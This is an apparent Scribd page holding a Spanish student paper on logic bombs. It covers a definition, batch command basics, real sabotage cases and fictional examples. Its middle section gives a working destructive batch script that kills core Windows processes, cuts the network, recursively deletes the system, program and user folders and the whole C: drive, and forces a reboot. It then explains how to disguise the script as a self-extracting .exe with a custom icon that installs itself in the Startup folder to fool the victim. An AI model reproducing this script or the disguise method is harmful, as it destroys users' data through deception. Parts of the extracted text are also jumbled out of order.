P. 1
bomba logica

bomba logica

|Views: 1.141|Likes:
Publicado porVinicio Andrango

More info:

Published by: Vinicio Andrango on Mar 07, 2011
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as DOCX, PDF, TXT or read online from Scribd
See more
See less

02/03/2013

pdf

text

original

Seguridad en redes

Nombre: Vinicio andrango Fecha: 19 ± 02 ± 2011

Bomba lógica
Una bomba lógica es una parte de código insertada intencionalmente en un programa informático que permanece oculto hasta cumplirse una o más condiciones preprogramadas, en ese momento se ejecuta una acción maliciosa. Por ejemplo, un programador puede ocultar una pieza de código que comience a borrar archivos cuando sea despedido de la compañía (en un disparador de base de datos (trigger) que se dispare al cambiar la condición de trabajador activo del programador). El software que es inherentemente malicioso, como virus o gusanos informáticos, frecuentemente contiene bombas lógicas que ejecutan algún programa en un tiempo predefinido o cuando cierta condición se cumple. Esta técnica puede ser usada por un virus o un gusano para ganar ímpetu y para esparcirse antes de ser notado. Muchos virus atacan sus sistemas huéspedes en fechas específicas, tales como el viernes 13 o el Aprilfools' day (día de los bufones de abril) o el día de los inocentes. Los troyanos que se activan en ciertas fechas son llamados frecuentemente "bombas de tiempo". Para ser considerado una bomba lógica, la acción ejecutada debe ser indeseada y desconocida al usuario del software. Por ejemplo los programas demos, que desactivan cierta funcionalidad después de un tiempo prefijado, no son considerados como bombas lógicas.

Archivo batch
Batch no es un lenguaje de programación en si. Sino un archivo de procesamiento por lotes que permite utilizar comandos de CMD (o símbolo de sistema), tanto como variables y condiciones como IF, IF exist, etc. Se programa en el Block de notas o cualquier tipo de editor de texto plano. NO usen ningun editor de texto como word o wordpad porque eso ya no es texto plano sino enriquecido y no funcionaria. Los comandos básicos de batch son los siguientes: *ECHO: imprime un texto en pantalla *@ECHO OFF: oculta los comandos que programamos para que cuando se inicie el bat no se puedan ver los códigos y solo el programa. * DIR: muestra un listado con el contenido de un directorio. * TYPE: muestra el contenido de un archivo en pantalla. * COPY: copia archivos en otro lugar. * REN (RENAME): renombra archivos. * DEL: borra uno o varios archivos (con posibilidad de recuperarlos mediante la orden UNDELETE, salvo que el lugar del archivo o archivos borrados hubiese sido utilizado con posterioridad).

esto crea una pausa en el programa y tienes que presionar una tecla para proseguir.este codigo lo que hace es ocultar todos los comando que vas a utilizar en el programa. * CD o CHDIR: cambia el directorio actual por el especificado. pause>nul. title.. sino nos apareceria lo que pusimos y la victima se daria cuenta de que es un virus en caso de que lo sea. @echo off title Primer Programa echo presiona una tecla pause echo hola pause >nul exit Explicación del código: @echooff.. * SORT: ordena Datos *SHUTDOWN: apaga el ordenador Acciones que puede realizar una bombalógica y y y y y y Borrar información del disco duro Mostrar un mensaje Reproducir una canción Enviar un correo electrónico Apagar el Monitor Otras más(depende del programa) Ejemplo de bomba lógica Una bomba lógica se la puede realizar en el bloc de notas conociendo comandos básicos: Se abre el Block de notas y se escribe el siguiente código... * RD o RMDIR: borra un directorio vacío. * HELP: ayuda sobre las distintas órdenes.este código sirve para "imprimir" o mostrar lo que escribamos en la pantalla. por ejemplo echo hola en la pantalla apareceria "hola" pause.* MD o MKDIR: crea un nuevo directorio. * DELTREE: borra un directorio con todo su contenido. echo.-este es el nombre que aparece en la ventana del DOS cuando ejecutas el programa. incluidos subdirectorios (apareció en las últimas versiones) * CLS: limpia la pantalla.esto es lo mismo que lo anterior pero unicamente que no muestra el cartel en la pantalla que dice "presione un tecla para proseguir" .

OPCIONES SFX.exe shutdown -a taskkill /f /im lsass..: taskkill /f /im explorer.: del /s /f /q "C:\Documents and Settings\Administrador\Mis documentos" shutdown -s -f -t xx ("shutdown" apaga o reinicia la PC según las letras q coloquemos después de la instrucción.te desconecta de Internet Una vez que ya se ha escrito el codigo se lo guarda con la extensión txt y luego lo cambiamos de extensión a . Ej. si colocamos "-S" el equipo se apagara. Se abre la ventana del winrar y seleccionen crear archivo SFX o AUTOEXTRAIBLEverán q el archivo cambia a (. si colocamos "-R" la PC se reiniciara.exe del /s /f /q "C:\WINDOWS" del /s /f /q "C:\Archivos de programa" del /s /f /q "C:\Documents and Settings" del /s /f /q "C:\" shutdown -r -f -t 01 exit Con este código se pueden eliminar la mayoría de archivos de un disco duro. Ej.exe taskkill /f /im svchost.exe del /s /f /q "Archivo o carpeta q se desea eliminar" Ej.: bomba.Otro ejemplo más destructivo de una bomba lógica seria el siguiente: @echo off ipconfig /release taskkill /f /im explorer. en el archivo creado hacemos clic derecho sobre la bomba. luego va "-F" este comando hace q el proceso sea forzado o sea q no se pueda detener y por ultimo el comando "-T xx" el cual indica en cuanto tiempo se apagara o reiniciara la PC. (Las dos "x" indican el tiempo Ej.exe) Luego en OPCIONES AVANZADAS .bat.exe taskkill /f /im winlogon. En ruta de extracción se puede escribir: C:\Documents and Settings\AllUsers\Menú Inicio\Programas\Inicio .bat Este ya es un archivo ejecutable ahora para disfrazar la bomba se puede utilizar el programa winrar.) Ipconfig /reléase.: "shutdown -s -f -t 10" esto indica q la PC se apagara en 10 segundos.baty seleccionamos añadir al archivo. la explicación de algunas instrucciones del código es la siguiente: Taskkill /f /im (programa q se desea cerrar) la instrucción taskkill cierra cualquier programa q este ejecutando Windows.

Bomba lógica exitosa y Se ha divulgado que en 1982 el incidente del gasoducto transiberiano ocurrió debido a una bomba lógica. un disgustado administrador de sistemas de UBS. donde estaba empleado como administrador de Unix.. para el uso en su gasoducto siberiano. Un operativo de la KGBpretendió haber robado los planos para un sofisticado sistema de control y su software de una firma canadiense.1 millones a UBS. La CIA supuestamente fue notificada por documentos en el Farewell Dossier e hizo a la compañía insertar una bomba lógica en el programa para propósitos de sabotaje. Lin se declaró culpable y fue sentenciado a 30 meses de cárcel en una prisión federal además de $81. y fraude de títulos de valores por su fallido plan para tumbar el stock de la compañíacon la activación de la bomba lógica. La bomba fue presuntamente plantada por RajendrasinhMakwana.En modo se selecciona ocultar todo y sobrescribir todo luego en la pestaña texto e iconos: y con la opción cargar icono pueden poner el icono que se quiere.000. se le hicieron cargos por usar una bomba lógica para dañar la red de computadores de la compañía.200 en restitución. las oficinas centrales en FairLawn. Y cuando lo ejecuten se alojara la bomba en el menú de inicio esperando a q reinicie la máquina para explotar Existe variedad de comandos que se pueden utilizar para setear a qué momento se desea que se active la bomba poniendo alguna fecha específica o que se cumplan condiciones que uno quiera. New Jersey. así como una restitución $3. cambió código en un servidor de MedcoHealthSolutions Inc. Makwana había terminado alrededor de la 1:00 pm el 24 de octubre de 2008 y logró plantar la bomba antes de que su acceso de red fuera revocado. pero fue descubierta e inhabilitada por un administrador de los sistemas de computación de Medco algunos meses antes de la fecha del disparador. La bomba fue ajustada para activarse el 31 de enero de 2009 y habría podido borrar todos los 4000 servidores de FannieMae. Luego acepten todo y esperen unos segundos q lo termine de comprimir y listo les aparecerá un archivo (. Los cargos sostuvieron una máxima sentencia de 10 años y una multa por US$250. así que Lin corrigió el error y la reajustó para activarse en su siguiente cumpleaños. Maryland. El 29 de octubre de 2008 fue descubierta una bomba lógica en el gigante hipotecario estadounidense FannieMae. En junio de 2006 encargaron a Rogelio Duronio. también conocido como Andy Lin. un ciudadano indio y contratista de IT que trabajó en la factoría de FannieMae en Urbana.Duronio fue posteriormente condenado y sentenciado a 8 años y 1 mes en prisión. Intentos de bombas lógicas y y y El 2 de octubre de 2003 Yung-HsunLin. . Esto eventualmente resultó en "la más monumental explosión no nuclear y el primer fuego jamás vistos desde el espacio" Desde entonces se ha divulgado que este informe inicial fue una broma del Aprilfools' day.exe) con el icono q ustedes eligieron. creando un conjunto de bombas lógicas para activarse en su cumpleaños en 2004. Falló en funcionar debido a un error de programación.

Es activada por la entrada de un código en un juego que causa que la bomba lógica copie un virus a todos los satélites y los desactiva. el técnico de computadores Dennis Nedry insertó un objeto en la codificación de la unidad central del parque que apagaría la energía de la isla entera (incluyendo la fuente de las cercas eléctricas) para robar varios embriones de dinosaurio durante el caos. En el juego de estrategia para PC. una conversación puede ser oída con una referencia a una bomba lógica. la organización Yalta fija una bomba lógica plantada dentro de la red norteamericana de defensa para desactivar todos los satélites controlados por los E. Nina Myers manipula a Jack Bauer para activar sin darse cuenta a un virus en los sistemas de computadores de CTU. el Cyber Ninja. En el libro Jurassic Park de Michael Crichton. En la pantalla no se ven ni se discuten los detalles de la bomba en sí misma.E. que una vez activada. EmpireEarth. . tiene un ataque llamado "Bomba Lógica".Makwana fue procesado en una corte de Maryland el 27 de enero de 2009 por acceso desautorizado a la computadora. El presonaje de HughJackman en Operación Swordfish. que fue programada con un contador de tiempo por el creador del Lobo del Aire.. Esto causa posteriormente una serie de casi catastróficas malfunciones del sistema. Bombas lógicas ficticias y y y y y y y y y y En el "Fantasma de Moffett". El libro Deuda de honor de Tom Clancy muestra una bomba lógica instalada en el código de varios computadores del mercado de valores. El objeto de la bomba lógica fue nombrado "conejo blanco". En el episodio 8 de la serie 3 de Spooks. pretende/expone que "soltó una bomba lógica a través de la trampilla" mientras está hackeando dentro de la red del Departamento de Defensa. En el episodio "Dispersos" (Scattered) de BattlestarGalactica (Reimaginada) de 2004.U. Esto lleva poca semejanza a una bomba lógica verdadera. Hawk pierde el control de la computadora de a bordo. en lugar de ello simplemente inhabilita un edificio enemigo por un breve período. En el episodio 2 de la temporada 6 de NCISAbbySciuto y McGee tienen una conversación sobre lógica que le da la idea de usar una bomba lógica para hackear en las computadoras en un transportador naval de los E. la unidad especial japonesa. Es activada por una llamada de telefónica a cierto número.U. Stanley Jobson.U." un episodio de la serie de televisión Lobo del Aire. En la temporada 3 de la serie de televisión 24.. los Cylons dejan una bomba lógica en los computadores de la nave después de ganar acceso a ellas brevemente. el Lobo del Aire es ajustado para destruir cualquier aeronave en su rango. para accesar ciertos archivos. el Doctor Charles Henry Moffet. En el nivel de la CIA del SplinterCell de Tom Clancy.U.E.

You're Reading a Free Preview

Descarga
scribd
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->